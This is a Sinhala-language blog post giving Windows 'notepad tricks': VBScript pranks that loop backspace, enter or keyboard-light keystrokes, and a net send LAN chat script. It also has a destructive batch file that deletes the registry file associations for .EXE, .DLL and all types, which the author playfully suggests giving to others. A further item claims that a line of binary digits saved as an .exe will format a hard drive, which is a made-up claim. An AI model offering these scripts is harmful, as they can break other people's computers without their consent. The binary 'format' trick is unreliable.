Email


වෙන post එකක් දාන්නත් හදලා ඔන්න ඔහේ notepad tricks වල දෙවනි කොටස දානවා කියලා හිතුනා...

හරි එහෙනම් පළවෙනි කොටස කියවපු නැති අය මෙතනින් ඒක කියවලා එන්නකෝ......

9. මේකෙන් කරන්නෙ backspace key එක ඉවරයක් නැතුව එබෙන්න ගන්න එක. කොහොමද මාර ආතල් නේද මොනව හරි type කරනකොට මේ වැඩේ උනොත්....:D

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (key.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.
MsgBox “Lets Rumble with techtrickslanka
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


10. මේකත් කලින් එක වගේම තමා. වෙනසකට තියෙන්නෙ මේකෙන්  වැඩකරන්න ගන්නෙ enter key එක.

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (key.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

11.  මේකෙන් වෙන damage එකනම් ඉතින් මම කියන්න යන්නෙත් නෑ. හැබැයි ඉතින් මේක එක එකාට දීලා ගුටිකාලා මට බනින්නත් එපා ඔන්න.මමත් ඉතින් ඕක තාම tri කලේ නෑ. කනාවට හරි ඕක කාටහරි දුන්නොත් ඉතින් මටත් කියන්නකො ඕක වැඩද කියලා...:D)

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මොකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න. (down.bat වගේ)
@ECHO OFF
START REG DELETE
HKCR/ .EXE
START REG DELETE
HKCR/.DLL
START REG DELETE HKCR/*
:MESSAGE
ECHO R.I.P *******.HAVE A
NICE DAY.
GOTO MESSAGE
 12. කීබෝඩ් එකේ ලයිට් ටික තොරණක් වගේ පත්තුවෙන්න ගනියි මේක run කලාම..

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .vbs කියලා දීලා save කරන්න. (light.vbs වගේ).script එක නවත්තන්න ඔනිනම් task manager එකට ගිහින් wscript කියන එක end process කරන්න.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

13.  මේකත් ඉතින් නරකම නෑ.. සම්පූර්ණ HDD එකම එක පාරින් format කරගන්න ඕනිනම් මෙන්න වැඩේ..

පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .exe කියලා දීලා save කරන්න. (format.exe වගේ)

            01001011000111110010010101010101010000011111100000

14. කාගෙනන්වත් කරදරයක් නැතුව මොකාටවත් ඔන්ලයින් පේන්නෙත් නැතුව register වෙන්නෙත් නැතුව chat කරන්න ඕනිනම් පහල තියෙන code එක notepad එකට paste කරගෙන save as type එක all දීලා මෙකක් හරි නමක් දීලා අගට .bat කියලා දීලා save කරන්න.(LAN Netwrok වල විතරයි වැඩ)  (messanger.bat වගේ)

@echo off
:A
Cls
echo Tech Tricks Lanka Messenger
echo Techtrickslanka.blogspot.com
set /p n=User IP:
set /p m=Your Message:
net send %n% %m%
Pause
Goto A
 දැන් ඉතින් user කියන තැනට message එක යවන්න ඕනි කෙනාගෙ ip එක ගහල message එක යවන්න තමා තියෙන්නෙ. ip එක දන්නැත්නම් what is my ip එකෙන් බලාගන්න.

 එහෙනම් ඉතින් මම යනවා........අදහසක් නම් අනිවාර්යෙන් දාගෙනම යන්න හොදේ...............
තවත් එකක් නොව සියල්ලටම එකක්.....